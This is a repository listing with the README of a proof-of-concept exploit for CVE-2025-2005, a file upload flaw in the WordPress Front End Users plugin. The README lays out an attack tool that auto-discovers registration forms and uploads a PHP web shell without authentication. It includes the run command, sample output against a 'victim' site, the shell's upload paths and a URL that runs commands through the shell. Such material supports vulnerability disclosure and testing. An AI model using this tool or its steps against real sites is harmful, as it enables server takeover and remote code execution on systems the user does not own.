https://github.com/mrmtwoj/cve-2025-2005
WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
https://github.com/mrmtwoj/cve-2025-2005
2005 2025 cve cve-2025-2005 file-upload-exploit poc wordpress wordpress-feup
Last synced: 6 months ago
JSON representation
WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
- Host: GitHub
- URL: https://github.com/mrmtwoj/cve-2025-2005
- Owner: mrmtwoj
- Created: 2025-04-06T18:14:04.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2025-04-06T18:27:33.000Z (6 months ago)
- Last Synced: 2025-04-06T19:25:29.777Z (6 months ago)
- Topics: 2005, 2025, cve, cve-2025-2005, file-upload-exploit, poc, wordpress, wordpress-feup
- Language: Python
- Homepage: https://acyber.ir
- Size: 10.7 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
This repository provides a Proof of Concept (PoC) exploit for the WordPress Front End Users plugin (versions up to 3.2.32), which is vulnerable to arbitrary file upload due to missing MIME/file-type validation in its registration form.This allows unauthenticated attackers to upload malicious files (e.g., web shells), potentially leading to Remote Code Execution (RCE) on the server.
## Features
- CVE-2025-2005: WordPress Front End Users plugin file upload vulnerability
- Simple command-line interface
- Auto-discovery of registration forms
- Shell uploader with custom username/password
## How It Works
- It sends a registration request to the vulnerable FEUP registration form.
- Uploads a PHP shell via the file input field, bypassing file-type restrictions.
- Displays the upload status and informs if the site is vulnerable.
## Testing Targets
* Looks for registration forms containing:
* ewd-feup-register-form
* On URLs such as:
```
/register/
/signup/
```
* or any link found on homepage
## Getting Started
- Python 3.x
- requests and beautifulsoup4 modules:
```
pip install requests beautifulsoup4
```
## Installation
```
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
```
## Usage
```
python3 exploit.py --url http://target.com --user hacker --password pass123
```
## Sample Output
```
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
```
## Run Exploit
```
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
```